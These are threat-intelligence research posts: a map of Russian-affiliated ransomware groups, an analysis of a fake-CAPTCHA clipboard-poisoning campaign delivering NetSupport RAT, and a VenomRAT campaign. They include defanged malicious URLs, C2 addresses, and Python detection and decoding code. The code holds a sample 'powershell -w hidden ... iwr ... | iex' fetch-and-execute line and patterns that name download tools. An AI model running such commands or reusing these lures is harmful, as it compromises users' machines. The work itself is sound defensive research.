Research
Mapping Hidden Alliances in Russian-Affiliated Ransomware

Understanding the landscape of cyber threats, particularly Russian-affiliated ransomware, is a complex and evolving challenge. The traditional model of tracking distinct, unified ransomware groups is becoming increasingly difficult. In the "post-Conti era," ransomware has transformed into a marketplace of mutations. It's no longer about centralized operations but rather a fractured ecosystem where allegiances shift and connections are often hidden.

In order to develop a deeper understanding and help others in the community in the process, Jon DiMaggio at Analyst1, Scylla Intel, and the DomainTools Investigations Team undertook a research project that culminated in a detailed infographic called “A Visual and Analytical Map of Russian-affiliated Ransomware Groups.” This work follows previous DomainTools research tracking ransomware families and provides a visual representation of the complex connections in this space.

The goal of this project was not simply attribution or listing individual groups. Instead, we set out to map hidden connections between criminal factions, going beyond just mapping "families" to understand the intricate relationships between them. The core focus was on identifying overlaps in human operators, code fragments, infrastructure, and TTPs (Tactics, Techniques, and Procedures). 

[Infographic: A Visual and Analytical Map of Russian-affiliated Ransomware Groups]

The Creation Process: A "Spider-Out" Investigation

Creating this map required a deep dive into the operational realities of various ransomware actors. Our methodology involved performing a "spider-out" incremental investigation. We began with well-known groups like Conti, LockBit, and Evil Corp, then expanded our research outwards, following the threads of connection.

To gather the necessary information, we drew upon a variety of sources:

  • OSINT (Open-Source Intelligence)
  • Historic infrastructure data
  • Proprietary threat intelligence
  • HUMINT (Human Intelligence) 

It's important to note that the published map includes only information that is already publicly available; nothing is revealed that could tip off adversaries.

Our analysis of these diverse data points helped isolate valuable signals from the surrounding noise. This included overlapping IP addresses, passive DNS records, shared certificates, web content, and delivery vectors used by different groups. These infrastructure overlaps imply potential resource pooling, bulletproof hosting, or affiliate-level reuse. We also analyzed code and TTP crossovers, such as the overlap between Black Basta and Qakbot or the use of legacy Trickbot infrastructure. The prevalence of shared tools like AnyDesk and Quick Assist also suggested common training, playbooks, or crossovers in operator organizations. And finally, we looked closely at the most important element, the people in these groups.
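One concrete way to turn the infrastructure overlaps described above into trackable clusters is to link hosts that share an artifact (an IP, a TLS certificate) and to discard artifacts so widely shared that they only indicate a CDN or bulk hosting. The Python below is an added example written for this page, not code from the DomainTools, Analyst1 or Scylla Intel project; every record in it is constructed (RFC 5737 documentation IP ranges, placeholder hostnames and brand names) and none is a real indicator. It also keeps the reason for every link so that an analyst can audit why two brands ended up in the same cluster, which is the practical side of "reuse does not equal identity."

```python
"""Cluster hosts by shared infrastructure artifacts (IP, TLS certificate).

Added example for this page; not code from the research project. All records
below are constructed (RFC 5737 documentation IPs, placeholder brands) and are
not real indicators.
"""
from collections import defaultdict
from itertools import combinations

# Constructed passive-DNS / certificate observations:
# (hostname, brand the host is publicly attributed to, artifact kind, artifact value)
SAMPLE_RECORDS = [
    ("panel-a.example",     "BrandA", "ip",   "203.0.113.10"),
    ("panel-a.example",     "BrandA", "cert", "sha1:aaaa"),
    ("leak-a.example",      "BrandA", "ip",   "203.0.113.10"),
    ("negotiate-b.example", "BrandB", "cert", "sha1:aaaa"),    # certificate reused across brands
    ("negotiate-b.example", "BrandB", "ip",   "198.51.100.7"),
    ("drop-c.example",      "BrandC", "ip",   "198.51.100.7"),  # IP reused across brands
    ("drop-c.example",      "BrandC", "ip",   "192.0.2.1"),     # shared hosting / CDN edge: noise
    ("unrelated-d.example", "BrandD", "ip",   "192.0.2.1"),
    ("unrelated-e.example", "BrandE", "ip",   "192.0.2.1"),
    ("unrelated-f.example", "BrandF", "ip",   "192.0.2.1"),
    ("lone-g.example",      "BrandG", "ip",   "203.0.113.99"),
]


class DisjointSet:
    """Union-find over hostnames; connected components become clusters."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_by_shared_artifacts(records, max_sharers=3):
    """Link hosts that share an artifact.

    An artifact seen on more than `max_sharers` hosts is treated as shared
    hosting / CDN noise and creates no link; that threshold is the main knob an
    analyst tunes. Returns (clusters, link_reasons): link_reasons maps each
    linked pair of hosts to the artifacts that joined them, so every edge is
    auditable rather than an unexplained merge.
    """
    hosts_by_artifact = defaultdict(set)
    brand_of = {}
    for host, brand, kind, value in records:
        hosts_by_artifact[(kind, value)].add(host)
        brand_of[host] = brand

    ds = DisjointSet()
    for host in brand_of:
        ds.find(host)                      # register isolated hosts too
    link_reasons = defaultdict(list)
    for artifact, hosts in hosts_by_artifact.items():
        if len(hosts) > max_sharers:
            continue
        for a, b in combinations(sorted(hosts), 2):
            ds.union(a, b)
            link_reasons[frozenset((a, b))].append(artifact)

    members = defaultdict(set)
    for host in brand_of:
        members[ds.find(host)].add(host)
    clusters = [
        {"hosts": sorted(hs), "brands": sorted({brand_of[h] for h in hs})}
        for hs in members.values()
    ]
    clusters.sort(key=lambda c: c["hosts"])
    return clusters, dict(link_reasons)


def cross_brand_clusters(clusters):
    """Clusters spanning more than one public brand: leads for resource pooling
    or affiliate reuse, not proof that the brands are one entity."""
    return [c for c in clusters if len(c["brands"]) > 1]


if __name__ == "__main__":
    clusters, reasons = cluster_by_shared_artifacts(SAMPLE_RECORDS)
    for c in cross_brand_clusters(clusters):
        print("cluster spanning", c["brands"], "->", c["hosts"])
    for pair, artifacts in reasons.items():
        print("  link", sorted(pair), "via", artifacts)
```

With the default threshold the 192.0.2.1 edge shared by four hosts is ignored and only BrandA, BrandB and BrandC end up linked (through one reused certificate and one reused IP); raising `max_sharers` pulls the three unrelated brands in as well, which is exactly the false-merge the threshold exists to prevent.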

Visualizing the Overlaps: Human Capital and Operator Drift

Perhaps one of the most significant findings visualized in the infographic is the human overlap and operator drift. Our research uncovered instances of known individual actors migrating across different ransomware ecosystems. For example, sources indicate individuals like “Wazawaka” have been associated with multiple groups including REvil, Babuk, LockBit, Hive, and Conti. Similarly, "Bassterlord" moved from REvil to Avaddon, then to LockBit, and finally to Hive.

This phenomenon highlights a crucial insight: brand allegiance among these operators is weak, and human capital, rather than any specific malware strain, appears to be the primary asset. Operators adapt to market conditions and reorganize in response to takedowns, and trust relationships are critical: these individuals choose to work with people they know regardless of the name of the organization. Indeed, rebranding in this context is a feature, not a bug. The infographic helps to visualize how these individuals move between groups, carrying their expertise and capabilities with them.

Key Takeaways from the Mapping:

The creation of this infographic reinforces several strategic takeaways:

  • Reuse does not equal identity. Different groups may share code or have human overlap but are not the same entity.
  • Group labeling is increasingly obsolete.
  • The modern threat landscape is best understood by tracking clusters of activity, not just named groups, and focusing on similar activity rather than specific names.

This new perspective, visually represented in this infographic, is crucial for understanding how ransomware operations function today. Groups act like modules, specializing and adapting as the marketplace matures. They exhibit a separation of responsibilities, with distinct roles for negotiators, developers, infrastructure managers, and leadership. Sanctions evasion strategies, such as Evil Corp’s repeated rebranding paired with infrastructure reuse, prove that while names may change, capabilities endure.

Understanding these hidden alliances and overlaps is key to developing and maturing more effective disruption strategies. As a community, we need to evolve how we track actors and criminal brands, recognizing that shared infrastructure or website artifacts might serve as more stable "fingerprints" than group names.

The full infographic provides a comprehensive visual guide to these complex relationships. We believe this work offers a new lens through which to view and counter Russian-affiliated ransomware, emphasizing the need to understand the underlying ecosystem and human networks rather than just transient names and tools.

Research
How Threat Actors Exploit Human Trust: A Breakdown of the 'Prove You Are Human' Malware Scheme

This report details a malicious campaign that uses deceptive websites, including spoofed Gitcodes and fake Docusign verification pages, to trick users into running malicious PowerShell scripts on their Windows machines. Victims are lured into copying and pasting these scripts into their Windows Run prompt, which then download and execute multiple stages of additional scripts, ultimately leading to the installation of the NetSupport RAT (remote access trojan).

Malicious Multi-Stage Downloader PowerShell Scripts Identified

Our team identified malicious multi-stage downloader PowerShell scripts hosted on multiple themed websites, including Gitcodes paste sites and fake Docusign CAPTCHA verification pages. These sites attempt to deceive users into copying an initial PowerShell script and running it from the Windows Run dialog. Once run, the script downloads a second downloader script and executes it, which in turn retrieves additional payloads and executes them, eventually installing NetSupport RAT on the infected machine.

Malicious PowerShell Scripts Hosted on Gitcodes

Malicious PowerShell scripts were found hosted on instances of Gitcodes sites for the purpose of downloading second-stage PowerShell scripts. The second-stage scripts also function as downloaders, making three or more web requests to retrieve and execute a third stage from other domains, which in turn retrieves and runs a fourth stage, resulting in NetSupport RAT running on the victim host.

Domain: gitcodes[.]org resolves to a website running a Gitcodes paste service titled “Gitcodes - #1 paste tool since 2002!” The paste is populated with a malicious PowerShell script that concatenates multiple strings to form a domain, then issues a web request to that domain with a specified user agent and runs the returned script. In the captured sample, the script calls out to http[:]//tradingviewtool[.]com using the user agent “TradingView.”

The script retrieved from tradingviewtool[.]com subsequently issues additional web requests to download three files from a different domain, “tradingviewtoolz[.]com,” and also makes multiple requests back to tradingviewtool[.]com. Initially the script reaches out to https[:]//tradingviewtool[.]com/info2.php, which appears to be a check-in that records the computer name at initial execution. Once the script completes its work and cleans up its local artifacts, it calls the same domain again at https[:]//tradingviewtool[.]com/info3.php with the computer name, likely signalling that the host is infected.

The captured second-stage script performs a series of actions to install the payload and make it persistent, all while hiding its activity and deceiving the user. It functions as a downloader, retrieving NetSupport RAT and running it on the system. The three downloaded files include a legitimate 7-Zip executable, which the script uses to unpack “client32.exe”; it then creates a new value under the current user's Windows Registry "Run" key pointing to that file. This ensures that `client32.exe` starts automatically every time the user logs in, establishing persistence for the malware. Naming the value "My Support" is an attempt to make it look less suspicious in lists of startup programs.
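A host-side check for the behaviour just described, written as an added example for this page rather than tooling from the report: Explorer records every command typed into the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and the persistence lands as a value under HKCU\...\Run, so both artifacts can be hunted on a suspect host. The sample registry content is constructed; the value name “My Support” and the file name client32.exe come from the report, while the on-disk path and the sample commands are assumptions.

```python
"""Hunt for 'paste it into Win+R' execution and the 'My Support' Run-key persistence.

Added example for this page, not tooling from the report. The detection
functions take plain dicts so they run anywhere; collect_live() reads the real
registry on Windows. The sample data is constructed; only the value name
"My Support" and the file name client32.exe come from the report.
"""
import re

# Explorer stores every Run-dialog command here; each value ends in "\1".
RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
RUN_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Traits of a pasted downloader; every hit becomes a tag on the command.
SUSPICIOUS_PATTERNS = [
    (r"\b(powershell(\.exe)?|pwsh)\b", "powershell"),
    (r"\b(mshta|certutil|bitsadmin|curl)\b", "lolbin"),
    (r"-(w|win|windowstyle)\s+hidden", "hidden window"),
    (r"-(nop|noprofile)\b", "no profile"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b", "web download"),
    (r"\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"https?://", "url in run dialog"),
]
HIGH_CONFIDENCE = {"web download", "invoke-expression", "encoded command"}


def score_run_command(cmd):
    """Set of trait tags matched by a single Run-dialog command."""
    return {tag for pattern, tag in SUSPICIOUS_PATTERNS if re.search(pattern, cmd, re.I)}


def flag_runmru(values):
    """values: {name: data} from RunMRU. MRUList lists value names, newest first."""
    names = list(values.get("MRUList", "")) or sorted(k for k in values if k != "MRUList")
    findings = []
    for name in names:
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw   # strip Explorer's "\1" suffix
        tags = score_run_command(cmd)
        if tags & HIGH_CONFIDENCE or {"powershell", "hidden window"} <= tags:
            findings.append({"mru": name, "command": cmd, "tags": sorted(tags)})
    return findings


USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def flag_run_key(values):
    """Run-key persistence: the campaign's value name, or NetSupport's client32.exe
    launched from a user-writable path (a legitimate install lives under Program Files)."""
    findings = []
    for name, cmd in values.items():
        low = cmd.lower()
        if name.strip().lower() == "my support":
            findings.append({"value": name, "command": cmd, "reason": "value name used by the campaign"})
        elif "client32.exe" in low and any(p in low for p in USER_WRITABLE):
            findings.append({"value": name, "command": cmd, "reason": "client32.exe from user-writable path"})
    return findings


def collect_live():
    """Read both keys from HKCU and run the checks; returns None off Windows."""
    try:
        import winreg
    except ImportError:
        return None

    def read(path):
        out = {}
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
                i = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, i)
                    except OSError:          # no more values
                        break
                    out[name] = str(data)
                    i += 1
        except OSError:                      # key absent
            pass
        return out

    return {"runmru": flag_runmru(read(RUNMRU_PATH)), "run": flag_run_key(read(RUN_PATH))}


# ---- constructed sample registry content ------------------------------------
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iwr http://example.invalid/x -UseBasicParsing | iex"\\1',
}
SAMPLE_RUN = {
    "OneDrive": r"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "My Support": r"C:\Users\victim\AppData\Roaming\support\client32.exe",   # path is an assumption
}

if __name__ == "__main__":
    print(collect_live() or {"runmru": flag_runmru(SAMPLE_RUNMRU), "run": flag_run_key(SAMPLE_RUN)})
```

RunMRU only survives as long as the user does not clear it, and a careful attacker's stage can delete its own entry, so treat an empty MRU as absence of evidence rather than evidence of absence; the Run-key check is the more durable of the two.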

Uncovering the Broader Malware Ecosystem Behind the Campaign

The observed infrastructure varied, but the combination of registration and website configuration patterns, together with the repeated use of the same malicious payloads, enabled the identification of additional lure sites serving similar downloader scripts. Common attributes across the Gitcodes lure sites:

Registrar:

  • Cloudflare
  • NameCheap
  • NameSilo

NameServer: 

  • cloudflare[.]com
  • luxhost[.]org
  • namecheaphosting[.]com

SSL Issuer: WE1

Website Title contains Gitcodes

[Screenshots: two example Gitcodes lure sites matching the pattern above]

Fake Docusign CAPTCHAs Used to Deploy NetSupport RAT

Pivoting on the NetSupport RAT samples being distributed and their associated infrastructure identified additional malware distribution domains, including websites spoofing Docusign. As with the Gitcodes sites, multiple stages of script downloaders were observed, ending with NetSupport RAT installed on victim machines.

An initial payload retrieves an “s.php” file from a domain spoofing Docusign, unzips it, and launches a script contained within it.

docusign.sa[.]com

The main malicious functionality is present in “docusign.sa[.]com/verification/s.php,” which is served ROT13 encoded, likely as a cheap obfuscation to evade signature-based detection. ROT13 (rotate by 13) is a Caesar cipher that replaces each letter with the letter 13 places after it in the alphabet; because 13 is half the alphabet, applying the same operation a second time returns the original text.

The page is designed to look like a Cloudflare "Checking your browser" / CAPTCHA page mixed with Docusign branding. The initial screen presents a fake CAPTCHA checkbox (.captcha-check). Clicking it triggers a request to "s.php?an=0," likely to log the click. The page then performs clipboard poisoning: an “unsecuredCopyToClipboard()” function is called, copying an encoded, multi-layered string to the user’s clipboard. The user is then instructed to press Win+R, Ctrl+V, Enter, in other words to open the Windows Run prompt, paste the malicious script, and run it.

Also on the s.php page, after the clipboard poisoning, an interval timer issues an AJAX GET request to c.php every second. If c.php returns "1," the current page (s.php) reloads (window.location.reload()). This is likely a check-in mechanism: the server flips c.php once the victim's host has run the pasted PowerShell, so the page can advance to the next stage.
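The decode-and-unwrap steps an analyst performs against such an s.php, as an added example written for this page (it is neither the campaign's code nor the report's tooling). The page fragment and the clipboard payload below are constructed to match the description above: the page is ROT13-encoded, the call to unsecuredCopyToClipboard() carries the payload, and a timer polls c.php. The report says only that the clipboard string is multi-layer encoded; this example assumes base64 over a UTF-16LE PowerShell command (the encoding -EncodedCommand expects) and uses the reserved .invalid TLD for hostnames.

```python
"""Decode a ROT13-wrapped 'verify you are human' page and unwrap its clipboard payload.

Added example for this page, not the campaign's code. The page fragment and
payload below are constructed to match the report's description; the host uses
the reserved .invalid TLD and the base64/UTF-16LE wrapping is an assumption.
"""
import base64
import binascii
import codecs
import re

PS_MARKERS = re.compile(
    r"\b(powershell|pwsh|iwr|irm|iex|invoke-[a-z]+|start-process|downloadstring)\b", re.I)


def rot13(text):
    """ROT13 is its own inverse: the same call encodes and decodes."""
    return codecs.decode(text, "rot_13")


def looks_like_powershell(text):
    return PS_MARKERS.search(text) is not None


def _try_base64(s):
    """Decode one base64 layer; UTF-16LE is tried first because that is what
    powershell -EncodedCommand expects. Returns (text, label) or None."""
    compact = re.sub(r"\s+", "", s)
    if len(compact) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc, label in (("utf-16-le", "base64/utf-16-le"), ("utf-8", "base64/utf-8")):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text, label
    return None


def peel(blob, max_depth=6):
    """Strip alternating base64 / ROT13 layers until a PowerShell command surfaces.
    Returns (command or None, list of layer labels removed)."""
    layers, current, seen = [], blob, set()
    for _ in range(max_depth):
        if looks_like_powershell(current):
            return current, layers
        if current in seen:            # ROT13 twice is the identity; stop cycling
            break
        seen.add(current)
        decoded = _try_base64(current)
        if decoded:
            current, label = decoded
            layers.append(label)
        else:
            current = rot13(current)
            layers.append("rot13")
    return None, layers


def analyze_page(raw_page):
    """Return the decoded clipboard command, the layers removed, and the polled endpoints."""
    page, layers = raw_page, []
    # Only ROT13 the page when that actually reveals the function name.
    if "unsecuredCopyToClipboard" not in raw_page and "unsecuredCopyToClipboard" in rot13(raw_page):
        page, layers = rot13(raw_page), ["rot13(page)"]
    polls = re.findall(r'\$\.get\(\s*"([^"]+)"', page)
    m = re.search(r'unsecuredCopyToClipboard\(\s*"([^"]*)"', page)
    if not m:
        return {"command": None, "layers": layers, "polls": polls}
    command, inner = peel(m.group(1))
    return {"command": command, "layers": layers + inner, "polls": polls}


# ---- constructed sample ----------------------------------------------------
PS_SCRIPT = 'powershell -w hidden -c "iwr http://example.invalid/s.php?an=1 | iex"'
CLIPBOARD_B64 = base64.b64encode(PS_SCRIPT.encode("utf-16-le")).decode()
PAGE_PLAIN = (
    '<div class="captcha-check"></div>\n<script>\n'
    'function unsecuredCopyToClipboard(t){var e=document.createElement("textarea");'
    'e.value=t;document.body.appendChild(e);e.select();document.execCommand("copy");}\n'
    'unsecuredCopyToClipboard("' + CLIPBOARD_B64 + '");\n'
    'setInterval(function(){$.get("c.php",function(r){if(r=="1")window.location.reload();})},1000);\n'
    '</script>\n'
)
SAMPLE_ROT13_PAGE = rot13(PAGE_PLAIN)   # what the server hands out

if __name__ == "__main__":
    print(analyze_page(SAMPLE_ROT13_PAGE))
```

The marker test at the top of peel() is what stops the loop, so extend PS_MARKERS when a sample uses cmdlets not listed there; a base64 blob of UTF-16LE text cannot accidentally contain those tokens with word boundaries, which is why the check is safe to run before each decode attempt.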

The string copied to the user’s clipboard decodes to a PowerShell script (shown in the original screenshot) that downloads a persistence payload, “wbdims.exe,” from GitHub. It starts it as a process, creates a COM object for Windows Script Host, and uses it to create a shortcut in the Startup folder so the payload executes automatically when the user logs in.

While this payload was no longer available at the time of investigation, the expectation is that it checks in with the delivery site via “docusign.sa[.]com/verification/c.php.” Doing so triggers the browser refresh, so that the page then displays the content of “docusign.sa[.]com/verification/s.php?an=1.”

The initial clipboard poisoning delivered a first-stage PowerShell downloader. The refresh of s.php (to s.php?an=1) delivers this second-stage PowerShell script, which then downloads and executes a third-stage payload (jp2launcher.exe from the zip file) retrieved by passing “an=2” argument to the same php page “docusign.sa[.]com/verification/s.php?an=2.”

Downloaded Zip File: 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd

The script then unzips the file and starts a process called “jp2launcher.exe”, which subsequently, goes through additional stages of file retrievals and executions resulting in a NetSupport RAT (3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7) being installed on the victim machine with these associated network actions:

http[:]//mhousecreative[.]com

http[:]//170.130.55[.]203:443/fakeurl.htm

In summary, the fake Docusign website is likely distributed via phishing attempts over email and/or social media. It is the beginning of an elaborate multi-stage NetSupport RAT delivery method that relies on deceiving users into "verifying they are human" by copying and running a malicious PowerShell script on their machines. The chain of scripts that download and run further scripts, which download and run yet more, is likely an attempt to evade detection and to be more resilient to security investigations and takedowns.

By breaking the attack into small, distinct steps, the attacker increases the chance that at least one stage will slip past initial signature-based defenses. Additionally, the early-phase files appear to be short lived or quickly identified and taken down, whereas the later stages appear to remain active for longer. The early stages are disposable pawns; the later stages are the more resilient end game.

The Widening Scope of Clipboard Poisoning Attacks

While ROT13 encoding can make some detections more difficult, particularly for services that preprocess server scan data, the samples themselves allow for more unique identification, such as the consistent use of the same strings and comment values within the PHP code.

Pivots on the clipboard poisoning scripts identified several other nearly identical instances of the code on a wider range of spoofed content, including Okta and popular media apps. Discord and GitHub were also identified as hosting next-stage malware, as in the following examples.

https[:]//oktacheck.it[.]com/s.php
https[:]//loyalcompany[.]net/s.php
https[:]//hubofnotion[.]com/steps.php

https[:]//raw.githubusercontent[.]com/MIGS2023/000/main/sihost.exe
https[:]//raw.githubusercontent[.]com/MIGS2023/000/main/svchost.exe

https[:]//cdn.discordapp[.]com/attachments/1212800072570241127/1213022984775106570/Netflix.scr?ex=65f3f1b5&is=65e17cb5&hm=a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d&

https[:]//cdn.discordapp[.]com/attachments/1212800072570241127/1213022984775106570/Spotify.scr?ex=65f3f1b5&is=65e17cb5&hm=a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d&

While attribution of this campaign is unclear, pivots on the associated infrastructure and malware identified reuse of associated NetSupport RAT hashes, similar delivery URL patterns, and similar domain naming and registration patterns observed in a previously reported cluster of SocGholish activity. Notably, the techniques involved are commonplace, and NetSupport Manager is a legitimate remote administration tool known to be leveraged as a RAT by multiple threat groups, such as FIN7, Scarlet Goldfinch, Storm-0408 and others.

Key Takeaways and Security Recommendations

This analysis highlights a sophisticated and persistent malicious campaign designed to deliver the NetSupport RAT through deceptive means, primarily leveraging spoofed Gitcodes and fake Docusign verification pages. The attackers employ a multi-stage approach, using seemingly innocuous "verify you are human" CAPTCHAs and malicious PowerShell scripts disguised as legitimate prompts to trick users into infecting their own machines. This method capitalizes on user trust and familiarity with common online interactions, such as document verification and code sharing platforms.

Key Security Recommendations:

  • Exercise extreme caution when prompted to copy and paste scripts into the Windows Run prompt: legitimate websites rarely, if ever, require users to execute PowerShell commands directly. Always verify the source and legitimacy of any such requests.
  • Be wary of CAPTCHA-like verifications that instruct you to run commands: genuine CAPTCHAs do not involve running scripts. Any prompt to do so should be treated as highly suspicious.
  • Verify the authenticity of websites: Double-check the URL and SSL certificates of websites, especially those that request sensitive actions or information. Be cautious of lookalike domains.

This campaign serves as a stark reminder of the evolving threat landscape. Attackers are continuously refining their techniques to exploit user behavior and bypass traditional security measures. Vigilance, user education, and proactive security practices are paramount in defending against these increasingly sophisticated threats. The "self-infect" tactic, while seemingly simple, can be highly effective, emphasizing the need for users to remain skeptical and verify all interactions before acting.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/prove-you-are-human.csv

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Research
Inside a VenomRAT Malware Campaign

A malicious campaign using a fake website to spread VenomRAT, a Remote Access Trojan (RAT), is detailed in this analysis. The malware includes tools for password theft and stealthy access. This research examines the attackers' methods, such as deceptive websites and command infrastructure, indicating a clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems.

VenomRAT, StormKitty, and SilentTrinity Deployment

Malicious domain “bitdefender-download[.]com” resolves to a website titled “DOWNLOAD FOR WINDOWS,” which spoofs Bitdefender’s Antivirus for Windows download page.

[Screenshot: the spoofed Bitdefender Antivirus for Windows download page (left) beside the legitimate page (right)] There are subtle differences between them, such as the legitimate page using the word “free” in several places whereas the spoofed version does not.

The “Download For Windows” button initiates a file download from the following Bitbucket URL:

https[:]//bitbucket[.]org/sadsafsadfsadf/dsfgdsgssdfgdsg/downloads/BitDefender.zip

The Bitbucket URL redirects to its content source on Amazon S3:

https[:]//bbuseruploads.s3.amazonaws[.]com/9e2daa63-bae3-4cbb-9f88-8154ba43261f/downloads/aa7b9593-2ccd-4cd0-9e04-9b4a7da9276b/BitDefender.zip

File Name           SHA256
BitDefender.zip     59a08decb8b960b65afe4d5446ef0e00e3a49ab747599b5ee6e7d43813040287
StoreInstaller.exe  e33b8b32bccfb50f604f06a306d1af89ae7b0d583bca20c41fa5811f526aa420

The bundled executable StoreInstaller.exe was found to contain malware configurations associated with VenomRAT. It also contained code associated with open source post-exploitation framework SilentTrinity and StormKitty stealer.

A report by Acronis describes VenomRAT as a RAT that originated as a fork of the open-source Quasar RAT. It is often used for initial access and persistence. Capabilities include remote access, credential theft, keylogging, exfiltration and more.

At a high level, the three malware families function as follows:

  • VenomRAT provides initial and ongoing access to victim machines
  • StormKitty quickly gathers credentials on the system
  • SilentTrinity is used for exfiltration and stealthy long term access

The inclusion of SilentTrinity and StormKitty (both open-source malware tools) indicates the attacker’s dual focus: rapidly harvesting financial credentials and crypto wallets during initial access, while also establishing stealthy, persistent access for potential long-term exploitation. The implications of long term access may include repeat compromise or selling access.

VenomRAT

Observed VenomRAT configurations showed multiple identifiable attributes that allowed for reliable pivots to other samples likely created by the same actor including the reuse of the same IP and port, 67.217.228[.]160:4449, for command and control.

Related samples using the same VenomRAT configurations:

File Name                  SHA256
StoreInstaller.exe         eb2b61a5f15b19bf7dd0ff3914d3019c26499dd693647b00c1b073037db72e35
File[@nightcore_4].exe     2d3dc51e6752c4fe95b2b7928ed11b5e06c6a68d19b7d884ab2c8eaab97d4e07
ClientAny.exe              b1810daed3653b8c2047ff05a01a67d840ce045b17b39c60f335d798612e96aa
(name truncated).EXE.MUI   ab5e758b27ca23fb06cccb7a5d0e337757b30f5eb0093c03071792516e64ed76
(not named)                6c8d7f5c3d035f134b7d24594c0c409f1fce4bd460d0b2c634fe49c758c44b13
(not named)                47e1270376345760986d86218c23c66c74afec864fbf6f1d300a6f39ab13f341
(not named)                5129e8833504d66bb7332a60e1677697bf3a4ecb2f763acee926e4a6add24160
rasdlui.exe                e07f8aa872a5bc6da07e6ddad3a3e9b7e1a57cec33b5bf16d6b56a150318fd81
Debris.exe                 1b6ed428a5e8255860a44ed6ed3c06079625b6a35762f363029ccb1b322392d4

VenomRAT C2 IPs

67.217.228[.]160:4449
172.93.222[.]102:4449
15.228.248[.]225:5552
94.141.123[.]234:4449
157.20.182[.]72:4449
185.208.159[.]121:6000
109.248.144[.]175:4449
95.216.115[.]242:9090

A reused RDP (TCP 3389) service configuration was identified via the Shodan query “hash:-971903248,” allowing pivots to additional IP addresses with the same configuration. Several of these IPs were confirmed as VenomRAT C2s, and the set is suspected to have been configured by the same actor.

157.20.182[.]35
185.23.253[.]204
157.20.182[.]68
185.23.253[.]138
157.20.182[.]167
212.232.22[.]77
157.20.182[.]72

Delivery Sites:

bitdefender-download[.]com
http[:]//185.156.72[.]2/files/5297474040/aNXlZBn.exe
https[:]//github[.]com/legendary99999/fbvsfdbafdbdqba/releases/download/fdbagbagdbad/adsqwe.exe/
https[:]//bitbucket[.]org/sadsafsadfsadf/dsfgdsgssdfgdsg/downloads/BitDefender.zip
https[:]//bbuseruploads.s3.amazonaws[.]com/9e2daa63-bae3-4cbb-9f88-8154ba43261f/downloads/aa7b9593-2ccd-4cd0-9e04-9b4a7da9276b/BitDefender.zip

Credential Harvesting Sites

The lure domain spoofing Bitdefender was observed with infrastructure and time-proximity overlaps to other malicious domains impersonating banks and generic IT services, suspected of being used for phishing. Common attributes:

NameServer: cloudflare.com

IP ISP: cloudflare.com

Registrar:

  • PDR Ltd
  • GMO Internet
  • NameSilo

SSL Issuer:

  • Cloudflare TLS
  • WE1

Server Type: cloudflare

idram-secure[.]live

Spoofs the Armenian IDBank page. Clicking through leads to a site titled “ArmCoin” whose content claims to be IDBank. The text is in Armenian and translates to: “To connect you to Idram Secure, please write to us in the chat. 🎉 Our chat is located in the bottom right corner of the page”

royalbanksecure[.]online

Spoofs the Royal Bank of Canada online banking login portal.

dataops-tracxn[.]com

Spoofs a Microsoft login page.

Protection from Open-Source Malware

This investigation reveals a deceptive campaign using VenomRAT, a powerful remote access tool, disguised as a legitimate Bitdefender antivirus download. Imagine clicking a button on what looks like a trusted site, only to unleash a trio of malicious programs, VenomRAT, StormKitty, and SilentTrinity, onto your system. These tools work in concert: VenomRAT gets in, StormKitty grabs passwords and wallet data, and SilentTrinity lets the attacker stay hidden and keep control. We tracked down the attackers' command servers, identified other malware they likely used, and uncovered their web of fake download sites and phishing traps spoofing banks and online services.

This campaign underscores a constant trend: attackers are using sophisticated, modular malware built from open-source components. This "build-your-own-malware" approach makes these attacks more efficient, stealthy, and adaptable. While the open-source nature of these tools can help security experts spot them faster, the primary victims here are everyday internet users. These criminals are after your hard-earned money, targeting your bank accounts and cryptocurrency wallets with fake login pages and malware disguised as safe software.

This isn't just a problem for big companies – it's a threat to everyone online. So, what can you do?

  • Be extremely cautious when downloading software. Double-check website addresses to make sure they're legitimate, especially for banking or login pages.
  • Never enter your credentials on a site you're not 100% sure about.
  • Practice safe internet habits: avoid clicking on suspicious links or opening unexpected email attachments.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/VenomRAT-Malware-Campaign.csv


Research
Hidden Threats of Dual-Function Malware Found in Chrome Extensions

